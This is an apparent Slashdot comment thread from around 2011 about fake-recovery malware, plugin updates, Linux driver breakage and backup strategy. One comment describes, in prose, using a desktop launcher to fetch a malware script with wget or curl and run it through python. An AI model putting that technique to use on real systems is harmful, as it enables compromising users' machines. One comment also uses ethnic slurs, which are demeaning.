Nope. Lynx. You can't infect something that doesn't support your attack vector, and never will because it's simply not capable of using them in the first place.

Notice you didn't say "THAN ANY OTHER WINDOWS BROWSER TO DATE."

Re:The Game of Catchup

[LurkerXXX]

Oh, and did I mention the default domain policy leaves Autoplay on? And in 2011, their storage available for your own working files is... 10 MB.

Inept.

Re:The Game of Catchup

[Khyber]

I love how you say it works on all browsers, implying that all browsers are graphical and not text-based.

No wonder you posted as AC, with as wrong as you often are!

Re:The Game of Catchup

[h4rr4r]

Yeah that is inept.

I can get you 1TB, on 10GbE for less than that, so long as you are ok sharing the backing disks, which are only 10k rpm. Obviously you don't get your own sysadmin or anything fancy for those prices. Over iscsi so you can use whatever encryption you want, we are just presenting a raw 1TB target. Or for another reasonable fee we do all the mounting and encryption as well, still ain't gonna get $50k.
If you don't have much churn backups are included. If you are replacing the whole 1TB daily it could get expensive to backup, add in maybe $10k worst case. Still not hitting $50k.

Maybe that much if you want your own set of disks, churn the whole 1TB per day and need them to be 15k. Comes with the 10GbE cards for the current servers your department owns. Yearly fee is going to be near nothing as well as long as you are ok sharing disks in the future.

Yet, still I have internal users bitch about my pricing.
Which is funny when they try to outsource stuff and end up coming back and paying me what I asked for in the first place.

Re:The Game of Catchup

[snemarch]

All it takes is one whitelisted domain being hacked or DNS poisoned, and you're outta luck - FF has no sandboxing and it doesn't drop unneeded privileges. At least it supports DEP and ASLR, but stil - it's a lot less than IE.

Yes, I do NoScript and ABP as well and try to be diligent about what I allow, but that doesn't mean I'm not aware of the risks.

Re:The Game of Catchup

[L0rdJedi]

Except that it won't: The user'd have to:
1. Click on the fake link.
2. Accept the file download(FF at least asks you to save or cancel with any download)
3. Right-click the saved file, click properties, and check the 'make excecutable' button.
4. Double click on the application, and then enter your password.

I think that'd take some doing to convince the user to do all that, especially when the user's used to clicking on the Main Menu -> System -> Update or w/e.

You think it takes something special other than "Now you're going to need to do a few things to get these updates to install because they're out of bandwidth updates. Just follow these simple steps and everything will be fine and you'll be completely secure".

It doesn't take much to make the average user think that what they're doing is going to completely secure their system.

Re:The Game of Catchup

[L0rdJedi]

And then there'll be that one package that people want that isn't available in the repository. Then they'll have to go out and find it somewhere else. That's where the trouble starts.

Re:The Game of Catchup

[LurkerXXX]

I wish they'd hire you to take over here. Or anyone competent. They have a handful of folks who know what they are doing, but not many in a huge department that always wants to include 6 staff members in any meeting only really needing 1, so they can bill more hours.

At least they are sometimes amusing. When I dropped off a SATA drive with some SQL databases for them to host for another project, I hung around for a few minutes to make sure they could import the data ok. I turned around for a minute and when I turned back their 'IT specialist' was trying to plug the 4 prong power plug for a floppy drive into the data socket of the SATA drive. Scared me a bit, but he stopped after I yelled.

Re:The Game of Catchup

[h4rr4r]

Sounds like inflated head count troubles. IT manager has too many bodies so he needs to find a way to pay them. That is when you get extra bodies in meetings and crazy prices for low speed storage.

Re:The Game of Catchup

[ternarybit]

Seriously. Combofix run from Safe Mode with Command Prompt = 99% of viruses removed. Run a full MBAM scan in normal mode and sfc /scannow if you're really paranoid. Move on with your life.

Re:The Game of Catchup

[L0rdJedi]

The only group that gets that privilege at my job are the engineers and that's only because their boss is above my boss.

FYI, it's probably not the IT department that doesn't think that other software is essential. It's probably the CTO/CIO/Whoever's in charge of spending money. That's the guy that IT always has to get approval from in order to spend money on anything. Get approval for MSOffice is relatively easy since everyone uses it. Getting approval for Photoshop is difficult since only 1 or 2 people (where I'm at) use it.

Installing the rest of that stuff wouldn't be a big deal (we keep a software inventory of everything installed on every machine). The problem of course comes when you see a new program that you want, which probably happens at least once a week. Then you'd have to tell IT that you're installing it (if you don't have admin and you're asking for a program to be installed, you're effectively telling IT you want it). You don't want to have to do that. Even though if you end up having a problem with something you'll be calling IT to troubleshoot it (and you're also assuming they know how to use every damn program you have installed) you don't want to have to bother with letting them know when you're installing every media player under the sun (you need WinAmp and VLC?)

Re:The Game of Catchup

[L0rdJedi]

This is effectively what we do with guys like that. We let them have at it. Then, when they call because something weird isn't working right, we tell them we don't know what's wrong and that we need to look into it. I'll spend less than 30 mins on the problem before getting another call telling me they figured out what's wrong and that it's working again. This happens a couple of times over a few months and then eventually something gets really hosed and their system gets really slow. At that point, we simply tell them that it would take a week or more to find the cause and that we'd still have to rebuild the computer from scratch. So they can give us 2 hours to rebuild their machine or they can just deal with it. If it's not a showstopper (it hardly ever is) they simply deal with it.

I have had this happen on multiple occasions with the same guy. It invariably comes down to either file system corruption or registry corruption. In any case, I really don't care because I have far better things to do than figure out what happened in the 6 months between when I gave him the fully functioning machine and when the problem appeared (which is usually something that showed up a week or two before I get the call, it's just "gotten in the way" now).

Re:The Game of Catchup

[metacell]

Whoosh?

Re:The Game of Catchup

[chromatix]

Sun - or rather Oracle these days - provide an autoupdater with every version of Java 6 for Windows that I've seen. It even seems to work.

Adobe also provide an auto-updater with recent versions of Flash Player for Windows. There might also be a periodic update check for Reader, although I suspect this kicks in only oce you launch it (which for many people might be very rarely, so a malfile might still open in an unpatched version anyway).

Ubuntu also auto-updates Flash Player and Reader if you installed them through the package system. It's just a piggy-back on an existing mechanism that works.

Of course, if people are still coasting along on versions prior to the introduction of auto-pdate, or have turned it off, or habitually hit Cancel when a prompt-to-update appears "because it's too much trouble right now", they have only themselves to blame.

Re:The Game of Catchup

[metacell]

Windows Update can only be used for a small selection of system software from Microsoft. It can't be used to download third-party software.

Apt (the packing tool used by Debian, Ubuntu and others) can be used for both the thousands of software packages provided in the distribution's repository, and for software packages from third-party repositories. Just add a new software source in your package manager, and the third-party packages will be updated just like all the other packages in your system.

In other words, Linux provides one single update mechanism for all software on a system, which works well in both theory and practice.

Re:The Game of Catchup

[Khyber]

"FF has no sandboxing'

You mean you don't BY DEFAULT sandbox every non-OS program?

LOL

Re:The Game of Catchup

Flash and Java both have an autoupdater... it annoys me instead of silently upgrading when I boot my computer.

Re:The Game of Catchup

[Xacid]

Why shoot before getting a chance to receive an answer? It sounds like he's running into some legit issues - ones that should at least be taken somewhat seriously.

Either:
a) there's a serious problem here or
b) he's misinformed/misunderstanding and this would be a ripe opportunity to educate him in a way that's not going to alienate him (as plenty of the *nix gurus like to do from time to time in my experience).

"can replace in use files" - I'll try to be reasonable here and ask this out of curiosity: I haven't fully used linux in years - are you telling me you can update the kernel live while logged in and without rebooting? If that's the case that's just damned impressive.

Re:The Game of Catchup

[MobileTatsu-NJG]

For instance, I'm sure I'm not alone in having seen BSODs on every screen at an airport or on an ATM. That doesn't (necessarily) mean it's actually insecure, but it does mean the software is still not stable enough to run anything important.

Uh, no, it means a hardware component failed, and that's not something Linux can defend against, either. Also, nothing about any OS means code written for it (such as the interface for an ATM....) will be bug free. For your point to be valid, you need to point out failures that are clearly the fault of the OS.

The headline answers your other question.

Re:The Game of Catchup

[Lime+Green+Bowler]

Back in April I had two people catch the same malware within a week of each other. Very similar to this, +h+s all of the files in the profile user directory so they've got nothing to click on, rewired the registry to trap the launch of executables- to call the malware with the executable name as a parameter, presumably so they could "shell" out to whatever you clicked on. Convenient way to re-infect a system. Popups for "Hard drive failing" blah-blah-bitemyass. After fixing the first one, I did the usual: uploaded the exe to Virustotal for verification then sent the sample file off to "two well known free AV vendors:". A week later, the second malware victim pops up. Tested the exe against both free AV packages. Neither complained about the executable. Uploaded it to Virustotal which immediately said this file was scanned over a week ago. Malwarebytes, Superantispyware, Spyware Doctor, Spybot- nobody got it. Then I took the executable to work where Symantec SAV Corporate with up-to-date defs happily scanned right past the malware file without a blink.

What? Oh yeah, the point. Tell your complainer that even up-to-date software can be as clueless as Sarah Palin. There's no guarantee that something out today will be detected tomorrow.

It's a computer. It can do anything. Make it do whatever I want. Use that HTML stuff if you have to." -- anonymous manager

Re:The Game of Catchup

[WorBlux]

3. Not really, a launcher doesn't need to be marked executable in most distros.

Re:The Game of Catchup

[cbiltcliffe]

"can replace in use files" - I'll try to be reasonable here and ask this out of curiosity: I haven't fully used linux in years - are you telling me you can update the kernel live while logged in and without rebooting? If that's the case that's just damned impressive.

Yes, you can.

Re:The Game of Catchup

[WorBlux]

The userspace is not tied to the kernel. The userspace to kernel api is extremely stable and things are almost never broken. There is really no reason you can't drop in a kernel several versions in either direction with some config changes.

. It's the drivers and internals which can change from release to release, but it has several advantages, not the leas of which is the ability to properly fix security bugs, and to only support the most up-to-date interfaces in the kernel, increasing maintainability and reducing total lines of code. Windows XP has to give 4 interfaces for USB devices to make sure nothing breaks, Linux while it has give through 4 interfaces, only has to support one. It also allows drivers to share a lot of code and infrastructure, reducing development and maintenance costs for hardware manufacturers.In fact Vista ended up breaking a lot of drivers just because the old interfaces were found to be both insecure and unmaintainable. Just because everyone else does it, doesn't mean its the Right Thing TM

Re:The Game of Catchup

[RobbieThe1st]

Uh, what? What sort of file are we talking about that would allow arbitrary code to be run /without/ setting the excecute bit?

Re:The Game of Catchup

[cbiltcliffe]

They aren't full-auto, though, and check for updates relatively seldom. And when Joe User sees a "please shutdown your browser to install update" right in the middle of his browsing session, he's going to click "nah, postpone" and forget all about it. Until next time the prompt pops up... in the middle of his browsing session. The Flash updater is notoriously lame, not offering a "retry" button.

The Flash updater runs at logon. I've never seen it pop up in a browsing session. I've seen it dozens of times pop up when the computer is first turned on. Considering that it takes all of 15 seconds to run, it's hardly excusable to do it later, when it won't even require a reboot at that point.

Re:The Game of Catchup

[cbiltcliffe]

Use process explorer to find the owning process of the updater window. Then, viewing properties of that program will show you the parent process. This might give you a hint as to where it's being started from.

Re:The Game of Catchup

[cbiltcliffe]

, or habitually hit Cancel when a prompt-to-update appears "because it's too much trouble right now", they have only themselves to blame.

That's nothing. I regularly run across people who cancel out of auto updates because "I think it might be installing a virus."

W....T....F?

Re:The Game of Catchup

[Dwonis]

Lynx runs on Windows.

Re:The Game of Catchup

[hairyfeet]

Off the top of my head...Nvidia, Realtek, Via, Broadcom, Aetheros, and ATI...that enough for you? These are just the ones off the top of my head where an update completely wasted the driver leaving a broken machine in its wake.

Frankly I have seen ONE, just one mind you, machine where it was able to go more than a single update without a single driver breaking, and that was a 10 year old Intel box I was getting ready to chunk and decided to try it. I still threw it away BTW, as nobody wants 10 year old junk anymore.

But I want to thank you, Mr Linux Zealot, thanks for giving a perfect example of why we retailers avoid your product because if we dare to say anything other than "Gee isn't Linux swell? Why it sure is Biff, and RMS's beard smells like roses!" then we get nothing but vicious hatred, with the words "shill" and astroturfer" being your nigger or wetback. anybody that doesn't get in line and follow the "Linux is perfect" meme gets shot down.

Finally you want some proof, 100% undeniable that my words are true? Will the largest OEM on the planet be good enough for you? Dell is having to run their own repos because if you dare to try to update from Canonical's it breaks the drivers.

But I'm sure that rather than admit you are wrong and that drivers are a serious problem, you'll instead trot out the trusted Linux TMs, which BTW they've made a site dedicated to the complete bullshit excuses Linux Zealots use to cover up their failings. So let me guess which ones you will use....let's see...how about "Use Distro X" "Works for Me" and "Astroturfer". Any I missed?

Re:The Game of Catchup

[snemarch]

For me it seems to pop up more or less at random - and while it doesn't require an OS reboot, it does require a firefox restart.

Re:The Game of Catchup

[StuartHankins]

The unholy software called Flash has the ability to possess the machine, unless you roll a natural 20 to save. Duh.

Re:The Game of Catchup

[Khyber]

Hasn't run on 7x64 for me, yet.

Re:The Game of Catchup

[WorBlux]

A destop or menu launcher doesn't need to be marked as executable (for most distros) for it to call any shell command. With it you could call a program with a known vulnerability and deliver the payload to exploit it, or wget or curl a malware python script, which does not need to be marked executable to execute if you pass the file containing commands as an argument to python.,

Re:The Game of Catchup

[jsvendsen]

And therein lies the rub. One dialog pops up, and we expect people to immediately pull the power cord and go rinse off under a hot shower. Another, seemingly identical, dialog pops up, and users are expected to click OK instantly and without question, providing their admin password if needed.

It's important to realize that without a keen and well honed intuition to tell you what is real and what is scam, something that most computer users will never develop, there is no difference between these two events. What is instantly obvious to you is completely invisible to them because they have no clue about the subtle cues that enable you to accurately classify something as an attempt to trick you. Complicating the matter further is that in all likelihood neither do you. Typically seeing the difference is an entirely subconscious process, making teaching it very hard and understanding the need to teach it perhaps even harder. I mean, it's obvious, right?

Re:The Game of Catchup

[RobbieThe1st]

Hm... Didn't think about that. That needs to be addressed: It should be required to be excecutable to run code inside, even if that code is being run by an external program. That - if true - needs to be addressed quickly.

Re:The Game of Catchup

People are quick to blame IE, Microsoft, antivirus companies, java/flash plugins. Here's an idea for once... how about blaming the ignorant user who wants to click on every link, pop-up ad, every search result and open up every email that they get! People have no common sense anymore. The basic user doesn't care. People think when they have the best security suite, all their security patches, they can do whatever. They believe they are protected to go to any website that they want because they are "fully protected". Wrong. There are a lot of applications that will provide decent protection, but ultimately it is up to the user to practice common sense while browsing.

And if it comes in through a legitimate site, then blame the owner of the site for not beefing up their security or for posting a malicious link that leads to the malware. Stop harping on security holes in browsers. IE has holes just as firefox and chrome has security holes in their browsers too. Hard to believe but they are there! We will never have a fully secure browser or flash or java plugins primarily because of those people out there who want to exploit technology weakness to make money. It'll never stop. The only way to reduce it is to educate people into smart browsing practices

Re:The Game of Catchup

[hairyfeet]

The problem is nobody cares if the OS won't run which is EXACTLY what you have now! Read my earlier post where I gave a link showing how even Dell, one of the largest OEMs on the planet, has to blow serious cash and man hours maintaining their own repos, because if you try to use Canonical's (or any Linux repos) the drivers break and you end up with a crippled machine. I mean I can make the most secure machine in the world if I make sure to break it so bad the user can't do anything, but do you think anybody would buy it?

And between 2K/XP to Vista/7 you are talking a combined 14 years of support where those drivers worked just fine, year after year after year. I have NO doubt with the new driver model we will see as long or even longer support, and I can take Vista drivers and drop them straight into Windows 7 with no hassles or recompiles, or forums, or futzing, it all "just works" and continues to work, no matter how many patches I apply.

Compare this to Linux, where out of the 6 machines I tested (4 desktop and 2 laptops, all with pretty bog standard hardware) where what I found was not a single one survived the updates unscathed. Not a single one. Sound , networking, video, wireless, there was always SOMETHING that didn't survive updates. Was there a simple "update driver" button? A simple way for an average user to easily get the functionality back? Nope it was back to the forums, for sometimes hours, scouring and trying different "fixes" in a vain attempt to get the hardware functional again. I'm sure you'll agree that for an OS for the masses that is simply unacceptable, especially when Windows 7 is so damned simple and intuitive my 68 year old clueless dad installed it by himself and it took care of everything including finding ALL the drivers and giving him a choice of free or pay AVs. The hardest thing he had was it asked "are you at home or at work?" and that was it.

So I hope you can see I'm not some troll, I'm a potential customer. I don't like having to shell out $100 a pop for Windows licenses, and would like to be able to offer low cost machines that anybody can afford. But when I can't even guarantee that the machine will be functional in a year, even if the user only follows best practices? I'm sorry but that is simply inexcusable. I sell to normal folks, not nerds or CS grads. They just want to come home, fire up their PC, and do the things normal folks do, Youtube, email, FaceBook. These jobs could be easily done by Linux but as long as Torvalds treats the kernel as his personal playground, as long as a simple update turns into a "Break linux NOW" button almost every single time without fail, as long as the ONLY way to return the machine to a usable state is to trawl some forum (that is if you haven't had the networking broken by the update) where you have to know the exact make, rev, model, etc AND after all that apply a whole bunch of CLI gibberish that the user won't understand and may/may not work? I'm sorry but that is simply not an acceptable product for home users.

Re:The Game of Catchup

[Zaiff+Urgulbunger]

Not run it for a few years now, but VMware Workstation used to be "entertaining" on Ubuntu. I was always able to get it to work in the end, but I did kind of "fear" the kernel update, and if I was short of time, I'd put off kernel updates until I knew I had time to fix the problems.

Re:The Game of Catchup

[laurelraven]

I'll give you that Windows Update does not update anything outside of Microsoft products...this is unfortunate, and I agree with you on that.

As for the updates you do get, my point was that I'd rather not leave it up to the user to remember to update. Further, if I give a user the ability to update with a package manager like Apt, they will also have the rights to install anything they want on the system (providing it is in the repositories). I'm sorry, but I really don't want users doing that; those systems are often shared with others, and the more crap they install on them, the further away those systems get from the corporate image.

Maybe I'm being a bit paranoid and controlling, but as the system administrator, I want to know what goes on on my network. I'm sure there is a way to do that with Linux, probably even better ways. Unfortunately, they all take time to implement. What I currently have took relatively little of the short time I have to spare.

Re:The Game of Catchup

[laurelraven]

You know, I've been meaning to set something like that up for just that reason. I just haven't had the time yet.

Re:The Game of Catchup

[WorBlux]

The dell you talk about had a GMA 500 chipset, whose drivers were not in-tree. All of intels other graphics chip-set are open drivers and have excellent linux support (still a few kinks getting worked out on sandy bridge though).The problems you talk about, while something you absolutely want of avoid on an OS for general consumers, about can be avoided with careful choice of hardware. I have a Samsung N120 without a single closed driver and it works perfectly. If I update the kernel, the drivers upgrade with it. Ubuntu does have an install addition drivers GUI that will track down a lot of the drivers

Re:The Game of Catchup

[WorBlux]

You can alias interpreters on the system to implement that check for you and prompts you whenever the interpreter is opening a non-executable file, but bash itself just considers the file you have a program interpret as just another another parameter. You could try to make the desktop environment need execute bits on launchers, but in reality is seems that launchers are interpreted rather than directly executed. Perhaps it could be solved that launchers need to be signed by the user or added to a white list to run, and that ordinary methods of making launchers automatically sign them, so that random ones off the internet are unlikely to work. It's not technically an exploit, but certainly something where there should be a patch ready to address this if something gets out in the wild that uses this.

Re:The Game of Catchup

I've removed this from two machines. In both instances, MSE caught it, but the user clicked this button to "allow it to run", just like they do every time that warning pops up. I've created user accounts for them, and that's how they run stuff from now on.

Re:The Game of Catchup

[hairyfeet]

Except you can't avoid it by choosing hardware because what works ATM may not work 6 months from now! Am I supposed to offer free hardware upgrades to all my customers when Torvalds gets an itch and borks something major that may not be fixed for months?

I have seen this happen with Realtek HD sound, with Via chipsets and sound, even the Aetheros wireless that so many on the forums pushed as "it just works" which BTW would have added a good $50 to any mobile build, well guess what happened? That's right, the latest updates is causing problems for those chips!

So I'm sorry, but as a retailer that has tried your product since Ubuntu 6.04, as well as PCLOS and Mepis, I'm afraid I have to agree with what one poster here said "Linux is free if your time is worthless". because if it was my own box on my own time, where I had nothing better to do than trawl forums with a list of my make/model/rev of hardware? then yes I could use Linux on my personal machine. But for my customers, who just want to "flip the switch and go" and have no desire no inclination to learn Linux forums nor CLI fix application? Then I'm sorry but its a mess.

Tell you what YOU try to design the hardware. Try to design a bog standard desktop and laptop using basic designs and then YOU go look at the forums and see if not at least one of those parts have been borked by updates between 6.04 and Ubuntu 11. I bet you'll find they have been borked at LEAST once, if not multiple times. Which only makes sense as you are talking about 10s of 1000s of drivers, all of which HAVE to keep up with Linus's constant kernel futzing. There is simply no way in hell all of those drivers for all of that hardware will be done in time for every single 6 month update, there simply aren't enough man hours dedicated to the job.

Again that is all well and good if it is only YOUR machine that gets borked, but I literally have on average between 4 and 7 boxes sold a week. do the math and see how much of my time would be dealing with pissed off customers who got "update foo broke my drivers" and how much of my time would be wasted trawling forums for fixes. my time costs a minimum of $35 an hour, at that rate it only takes a little over 2 hours for Windows to become the cheaper solution. I can easily blow 4 or 5 hours minimum on a PITA driver breakage. the ONLY machines I have found where one can expect even a 2 year run without breaking is enterprise class hardware where the OEM supports Linux, like HP workstations. The MUCH higher price of those simply makes them not worth even looking at. Again if Linux would fix this major deficiency, instead of sling insults and kissing Torvalds butt, Linux might get somewhere in the retail space. Because there are plenty of guys like me that would stock it.

But you'll notice the ONLY places selling Linux boxes are online, where they don't have to support it after the sale. that is VERY telling, because I guarantee you that like me if they actually had to support the things after the sale that would find Linux a money pit. When you can't even get a single national retailer to stock your product in their B&M stores? And everyone from staples to Walmart has tried and failed due to returns rates being insane? Then it is high time to ask 'What are we doing wrong?" and I'd say the constant driver breakage, which c'mon! Its 2011 not 1991 folks, is a hell of a reason to avoid your OS in the retail sector!

Re:The Game of Catchup

[gad_zuki!]

Microsoft does offer these vendors Windows Update. Heck, a few years ago Adobe was using it for a critical exploit. If you run WSUS or System Center you can see that MS goes out of its way for third-party updates.

Turns out Adobe and Sun have a 'not invented here' problem with using MS.

Re:The Game of Catchup

[gad_zuki!]

Buzz! learn how to read. I said like Chrome, which means that the update is done in the background with zero user intervention. I thought this was obvious but I guess the low reading comprehension contrarian nitpick brigade is in full force today.

Re:The Game of Catchup

[whoever57]

Microsoft does offer these vendors Windows Update.

Link or you are spewing BS. Meanwhile here's my counter link.

What MS does do is to include some 3rd party drivers in its own catalog, which is entirely different to my suggestion. Just to clarify, I am not suggesting that MS host the 3rd-part updates, instead, it should provide an API and processes to search for updates from 3rd-party sites then download and install those updates.

Re:The Game of Catchup

[SiChemist]

Really? An AC that is obviously trolling is "the face of Linux". What kind of moron would accept that premise?

Re:The Game of Catchup

>Oh, and by the way, Microsoft, your fucking browser still sucks and is still atrociously insecure. Shape up, Redmond.

Really? Care to point to some statistics showing me big holes in IE9 that are actively used by malware?

Not much out there. Oh, there's no shortage of Java, Flash, and Adobe Reader holes, and according to stats lifted from crimepacks those are the ones used.

I just looked at that stats on my website. 90% of those users have Java installed. How many of those are the latest version? Maybe 50% Most of the flash installs are not the latest version. Who knows what version of Reader they have.

Plugin security is a nightmare right now. Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash. Joe User has no idea what he's doing with a computer. Blaming MS isn't really helping him.

Most users are not using IE9. there are hints from microsoft that they should, OH WAIT, most people that aren't savvy, are in windows XP land still. Want them to use IE9? Can't. IE 6,7 what they are used to, and have been for a long time, is getting them into trouble.

Re:The Game of Catchup

[cbiltcliffe]

You're not getting what I mean. I'm not meaning web/javascript popups that come up when you're browsing pr0n. I'm talking about the popup balloon indicators from the system tray, that come from programs already running on your computer.

They're afraid that something already running on their computer will install malicious software, without realizing that if this is the case, they're already infected.

Re:The Game of Catchup

[metacell]

I'm not a Linux guru either, but I think there's an option to install all security updates automatically, without user interaction, when you install Ubuntu.

Re:The Game of Catchup

Adobe does have an auto-updater. The sad thing is that it checks when you boot your computer. Most people I know (myself included) merely put their computer to sleep when not using it. I reboot my Windows desktop at most once a month if a patch requires it, and less often if a patch doesn't require a reboot. So checking for updates once a month at best isn't going to cut it.

Re:The Game of Catchup

[gad_zuki!]

I manage a WSUS environment and push out Adobe Flash and Reader updates every month via WSUS and System Center. You can yell "bullshit" all you want but that makes you an ignorant person and sadly, people like you just never learn because its easier to keep obsessing over your biases than admitting youre wrong and learning something new.

Re:The Game of Catchup

[whoever57]

I manage a WSUS environment and push out Adobe Flash and Reader updates every month via WSUS and System Center. You can yell "bullshit"

I'll continue to yell "bullshit" while you fail to provide a link and because your use of WSUS to push out 3rd party updates doesn't answer my point of MS providing an API for 3rd party tools to hook into the Windows/Microsoft update tools.

Stop being an apologist for MS and realize that not everyone runs a WSUS server or has the time to download and push out updates like this. People want to have a single method to automatically download updates without having to set up their own server just to get the updates.

Sounds Like System/Windows Recovery

This is not new, nor even a new tactic. I have come across malware that held user's data to ransom by encrypting it. System/Windows recovery are, (rather unfortunately) extremely easy to pick up when a gullible user mistakes an error notification on a web site for a local machine generated message and interacts with it accordingly. These Malware applications also disable anti-virus software and associated services for many popular AV/Security products, which in my opinion is a damning indictment of those products.

Fortunately as easy as it is to pick up, it's also relatively easy to remove, there are many free tools available that do just that. However you may wish to reconsider re-installing your O/S after you virus and malware scan your data and then perform a backup (post removal) I generally wouldn't trust an installation that has been compromised by malware such as this.

Re:Sounds Like System/Windows Recovery

[MightyMartian]

Well, in my case, the most it could do is fuck with the files that the user had permissions to fuck with. The system itself, other than the profile, was fine. I was thinking about putting in some software execution policies, only to find out that they're pretty well useless.

Re:Sounds Like System/Windows Recovery

[adolf]

I just cleaned this off of a computer two days ago.

It set some registry entries values meant for maximum fuckery, marked every file on the disk that it could access as being hidden (thus even "dir" from a command line would result in "File not found,") and nuked the contents of the start menu, and did some other mean stuff.

Malwarebytes removed it but left the registry broken (which is arguably correct behavior). I changed the registry entries by hand, and I restored the start menu from an earlier copy.

After that, things were happy...except for a lingering, and possibly unrelated, issue with links from Google being redirected to spam. This turned out to be an infected Windows DLL, which "sfc /scannow" couldn't/didn't bother to fix. I was just about to give up on the machine for a happy time of nuke/reinstall, and another half-dozen hours of putting the machine back how it was... but then I tried combofix and the redirect problem went away, too.

All said: While I am a little richer having fixed these problems, money is poor compensation for this sort of pain.

I welcome the day when an affordable online service* can do incremental backups that can be used for a simple, bare-metal restore. Bandwidth isn't the issue anymore, and spinning storage is cheap; where is it?

*: Yes, online. If it's offline, that means that folks will have to think about it on a regular basis, and it won't be done.

Re:Sounds Like System/Windows Recovery

[amliebsch]

If this is Win7, it doesn't have to be online. Just attach an external USB disk and tell it to back up there. It will automatically do an image+incrementals, auto-delete the oldest images when the disk is getting full, and can be bare-metal restored booting from the Windows DVD. It's actually pretty sweet.

Also: if the registry is hosed, system restore should be able to help you out.

Re:Sounds Like System/Windows Recovery

Dis is one half.

Re:Sounds Like System/Windows Recovery

[adolf]

If the malware takes control of the PC (which it does, in the context of the FA), then having a single, locally-attached backup disk isn't necessarily a good answer: It can destroy/disrupt the backup just as easily as it can anything else on that PC.

A well-thought-out rotation of backup media would help, but that's no good because it involves humans who simply won't do it.

This wouldn't be a problem, so much, with good online storage: Even Dropbox does a good job of keeping old copies of your data intact for a period of time. I simply want the concept extended to an entire disk, with metadata intact, to enable a bare metal recovery.

This, combined with extra, out-of-band human verification (SMS?) for when you Really, Really want to destroy backup data, would work well against malware.

(And, yeah: I did use System Restore eventually. I consider it to be a last resort, though, simply because I am ignorant as to the extent of its workings and I am prejudiced against system-level programs which do not provide meaningful feedback as to what they're doing.)

Re:Sounds Like System/Windows Recovery

[MokuMokuRyoushi]

except for a lingering, and possibly unrelated, issue with links from Google being redirected to spam

Hey - I just had the same problem with an office computer. I got rid of it the same way, but for some unidentifiable reason, about half the links in FF now are opening in IE. Did you have the same issue? If so, have you figured out the problem?

False alert

[lucm]

A little while ago I was sure I had this malware on my computer. However the actual problem was worse: I had a Seagate hard drive.

There is an upside with Seagate products: they taught me the importance of using RAID and/or backups.

Re:False alert

[LurkerXXX]

AND BACKUPS! *AND BACKUPS*!!!

RAID is *NOT* a substitution for backups. Delete a file on the RAID and it's gone. Someone takes the machine, and it's gone.

Backup your computer to offline media, and make sure to keep a (hopefully encrypted) copy of it at some remote location (like a family members house, work, wherever)

RAID IS NOT A SUBSTITUTION FOR BACKUPS!

Re:False alert

[adolf]

Seconded, and furthered:

RAID would do nothing to protect against the thing described in TFA.

RAID only protects against hardware failure, and even then only if the failure is actually detected instead of just silently munging data.

This is not to say that RAID is not useful: It can be a performance boost in some applications. It can provide a clever way to combine many smaller disks into one larger volume, which can also be useful in some instances. To be sure, some of the things RAID does do can be very cool for a lot of different reasons.

But RAID is not a backup. It never was, and it never will be.

Re:False alert

[lucm]

> Delete a file on the RAID and it's gone

Do you check that all your files are there before taking a backup? Probably not. Even if you have a very complex strategy of nested backup with grandfather and his whole family, odds are that once you notice that the said file is gone, it is also gone on your backup.

You see, just typing stuff in uppercase does not mean you are right. There is a whole discipline around this kind of stuff, it's called Information Lifecycle Management. But in any case this is completely off-topic, as my comment was merely an opportunity to complain about my bad experience with Seagate hard disks.

> RAID IS NOT A SUBSTITUTION FOR BACKUPS!

UPPERCASE IS NOT A SUBSTITION FOR HAVING SOMETHING INTERESTING TO SAY.

Re:False alert

I always tell people RAIDs give you very nice copies of nothing if you format drives or delete files. Always keep off-array and preferably off-site backups.

Re:False alert

Someone takes your backup, and it's gone.

What was your point again?

Re:False alert

[WuphonsReach]

Do you check that all your files are there before taking a backup? Probably not. Even if you have a very complex strategy of nested backup with grandfather and his whole family, odds are that once you notice that the said file is gone, it is also gone on your backup.

rdiff-backup

The backup directory has a pristine copy of the current data, with the outdated content stored as incrementals going back as far as you want. (We do 13 months.)

Any sort of delta/snapshot style backup strategy handles this just fine. As long as you have enough space on the backup media to store all of the deltas for the time duration that you want.

Re:False alert

Notice the comment about keeping a backup offsite.

Anonymous moron.

Re:False alert

[lucm]

> The backup directory has a pristine copy of the current data, with the outdated content stored as incrementals going back as far as you want. (We do 13 months.)

Which is awesome. Having 13 months of deltas that are absolute garbage if you lose the backup directory means that every time you run your backup you play russian roulette with your deltas (and with 12.96 months of backup history). You might feel like you have a bullet-proof system but actually my aunt who runs NTBackup every once in a while is better protected than you (she also does a terrific apple pie).

Keeping old deltas is not a backup strategy. Keeping old deltas is a convenience that one can offfer to users so they can access data as it was a long time ago. For disaster recovery purposes, one need reliable, fully independent backups.

Once in a while we see in the news some big company who lost a lot of data and was unable to restore it from their backup. A long chain of deltas is often involved.

> Any sort of delta/snapshot style backup strategy handles this just fine. As long as you have enough space on the backup media to store all of the deltas for the time duration that you want

I totally disagree with your backup strategy, however you are correct that an unlimited amount of deltas and an unlimited amount of space will definitely handle the loss of a file - as long as your main backup is working and as long as the creation and loss of the file does not occur between your backup windows.

Re:False alert

[h4rr4r]

The deltas are stored with the fulls. All on the same device. Many of those devices exist. I can pull one of any of 30 tapes right now and get that days full and the files that changed going back 30 days. Before you ask those are just the dailies, there are also monthlies, quarterlies and yearlies, those each go on 4 tapes so I can lose 3 of them.

Even if on every one of those tapes the base full was gone, I would have every file that changed. The whole file is recorded if it changed, meaning since these backups go back for years I could still get damn near all the data. To be that bad off though something would have to damage 100+ tapes. Most of those being inside an underground vault, which sounds cool but is really just an old bank.

Using rsnapshot each device having full + delta(whole that changed file, not just the part that changed) is the standard practice. You make some rather poor assumptions, clearly from lack of information.

If your aunt is running NTbackup to the same device over and over she is going to be very sad when it fails. Also make sure that device is off site.

Re:False alert

[hb79]

> However the actual problem was worse: I am still using Windows.
FTFY.

Although, the real problem is that you're posting on Slashdot about it. We're not interested, ok? I'm sure there's a .net forum somewhere you can rant on.

Re:False alert

Offsite compromised, and it's gone.

What's the point again?

Re:False alert

It appears the main point is maintain multiple copies, preferably duplicated offsite to minimize the lose of data during catastrophic events. But the smug appears strong in the original poster so it's difficult to say for sure. Nothing is ever guaranteed and people who jump on the "RAID is not backup" bandwagon can't see the forest through the trees.

Re:False alert

[lucm]

> Although, the real problem is that you're posting on Slashdot about it. We're not interested, ok?

It's easy to spot insecure people, they tend to talk in the name of a group because they feel their opinion as an individual is not worth a lot.

